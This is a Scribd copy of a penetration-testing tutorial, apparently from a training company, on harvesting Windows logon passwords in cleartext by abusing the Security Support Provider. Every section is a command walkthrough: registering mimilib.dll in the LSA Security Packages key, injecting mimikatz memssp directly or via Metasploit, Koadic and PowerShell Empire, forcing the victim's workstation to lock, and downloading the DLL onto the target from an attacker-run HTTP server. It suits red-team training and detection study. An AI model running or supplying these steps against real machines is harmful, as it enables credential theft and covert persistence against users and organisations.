Scribd
Upload
79 views14 pages

Credential Dumping Security

The document discusses various methods for exploiting the Security Support Provider (SSP) on Windows systems to dump credentials in plain text. It covers using Mimikatz directly or via Metasploit, Koadic, PowerShell Empire. The manual method uses mimilib.dll to create a file with dumped credentials after a reboot. Metasploit and Koadic allow injecting Mimikatz into memory to dump credentials after forced logout. PowerShell Empire similarly allows dumping credentials via its mimikatz-based module.

Uploaded by

cptraavan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
79 views14 pages

Credential Dumping Security

The document discusses various methods for exploiting the Security Support Provider (SSP) on Windows systems to dump credentials in plain text. It covers using Mimikatz directly or via Metasploit, Koadic, PowerShell Empire. The manual method uses mimilib.dll to create a file with dumped credentials after a reboot. Metasploit and Koadic allow injecting Mimikatz into memory to dump credentials after forced logout. PowerShell Empire similarly allows dumping credentials via its mimikatz-based module.

Uploaded by

cptraavan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 14

Contents

Introduction to Security Support Provider ..........................................3


Manual ..............................................................................................3
Mimikatz ...........................................................................................7
Metasploit Framework .......................................................................8
Koadic................................................................................................9
PowerShell Empire ........................................................................... 10
Powershell Empire: mimilib.dll ......................................................... 12

Page 2 of 13
Introduction to Security Support Provider
Security Support Provider (SSP) is an API used by Windows to carry out authentication for Windows Login.
It's a DLL file that provides security packages to other applications. This DLL stacks itself up in LSA when
the system starts, making it a start-up process. After it is loaded into LSA, it can access all of the window’s
credentials. The configurations of this file are stored in two different registry keys, and you can find them
in the following locations:
KLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

Manual
The first method that we are going to use to exploit SSP is manual. Once the method is successfully carried
out and the system reboots itself, it will dump the credentials for us. These credentials can be found in a
file that will be created upon user login with the name of kiwissp. This file can be found in the registry
inside hklm\system\currentcontrolset\control\lsa.

The first step in this method is to copy the mimilib.dll file from the mimikatz folder to the system32 folder.
This file is responsible for creating the kiwissp file which stores credentials in plaintext for us.

Page 3 of 13
Then navigate yourself to hklm\system\currentcontrolset\control\lsa. And here you can find that there
is no entry in Security Packages, as shown in the image below:

Page 4 of 13
The same can be checked with the following PowerShell command:

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

Just as shown in the image below, there is no entry. So, this needs to be changed if you want to dump the
credentials. We need to add all the services that help SSP manage credentials; such as Kerberos, wdigest,
etc. Therefore, we will use the following command to make these entries:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d


"kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f

And then to confirm whether the entry has been done or not, use the following command:

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

Page 5 of 13
You can then again navigate yourself to hklm\system\currentcontrolset\control\lsa to the enteries that
you just made.

Whenever the user reboots their PC, a file with the name kiwissp.log will be created in system32. Then
this file will have your credentials stored in cleartext. Use the following command to read the credentials:

type C:\Windows\System32\kiwissp.log

Page 6 of 13
Mimikatz
Mimikatz provides us with a module that injects itself into the memory and when the user is signed out
of the windows, the passwords are retrieved from the memory with the help of this module. For this
method, just load Mimikatz and type:

privilege::debug
misc::memssp

Running the above commands will create a mimilsa.log file in system32 upon logging in by the user. To
read this file, use the following command:

Page 7 of 13
type C:\Windows\System32\mimilsa.log

Metasploit Framework
When dumping credentials remotely, Metasploit really comes in handy. The ability of Metasploit to
provide us with a kiwi extension allows us to dump credentials by manipulating SSP just like our previous
method. When you have a meterpreter session through Metasploit, use the load kiwi command to initiate
the kiwi extension. And then, to inject the mimikatz module into memory, use the following command:

load kiwi
kiwi_cmd misc::memssp

Now the module has been successfully injected into the memory. As this module creates the file with clear
text credentials when the user logs in after the memory injection; we will force the lock screen on the
victim so that after login we can have our credentials. Run the following commands for this:

shell
RunDll32.exe user32.dll,LockWorkStation

Now we have forced the user to logout the system. Whenever the user will log in our mimilsa file will be
created in the system32 and to read the file use the following command:

type C:\Windows\System32\mimilsa.log

Page 8 of 13
Koadic
Just like Metasploit, Koadic too provides us with a similar mimikatz module; so, let’s get to dumping the
credentials. Once you have a session with Koadic, use the following exploit to inject the payload into the
memory:

use mimikatz_dynwrapx
set MIMICMD misc::memssp
execute

Page 9 of 13
Once the above exploit has successfully executed itself, use the following commands to force the user to
sign out of the windows and then run the dll command to read the mimilsa file:

cmdshell 0
RunDll32.exe user32.dll,LockWorkStation
type mimilsa.log

As shown in the above image, you will have your credentials.

PowerShell Empire
The PowerShell Empire is an outstanding tool. We have covered the PowerShell Empire in a series of
articles. To read the articles, click here. With the help of mimikatz, empire allows us to inject the payload
into the memory, which further allows us to retrieve Windows logon credentials. Once, to have a session
through the empire, use the following post exploit to get your hands on the credentials:

usemodule persistence/misc/memssp
execute
misc::memssp

Page 10 of 13
After the exploit has executed itself successfully, all that is left to do is lock the user out of their system so
that when they sign in, we can have the file that saves credentials in plaintext for us. And no to lock the
user out of their system use the following exploit:

usemodule management/lock
execute

After the user logs in, the said file will be created. To read the contents of the file use the following
command:

type C:\Windows\System32\mimilsa.log

Page 11 of 13
Powershell Empire: mimilib.dll
In the manual method, everything that we did can also be done remotely through Empire, which is useful
in external penetration testing. The first step in this method is to send the mimilib.dll file from the
mimikatz folder to the system32 folder on the target system. To do so, simply go to the mimikatz folder
where the mimilib.dll file is located and initiate the Python server as shown in the following image:

ls
python -m SimpleHTTPServer

After that, through your session, run the following set shell commands to do the deed:

shell wget http://192.168.1.112:8000/mimilib.dll -outfile mimilib.dll


shell reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
shell reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d
"kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f

Page 12 of 13
From the above set of commands, the first command will download mimilib.dll from your previously made
Python server onto the target PC, and the rest of the two commands will edit the registry key value for
you. As the commands have been executed successfully, all that is left now is to wait for the target system
to restart. And once that happens, your file will be created. To access the file, use the following command:

shell type kiwissp.log

And we have our credentials. Yay!

Page 13 of 13
JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security


Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer


Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in

You might also like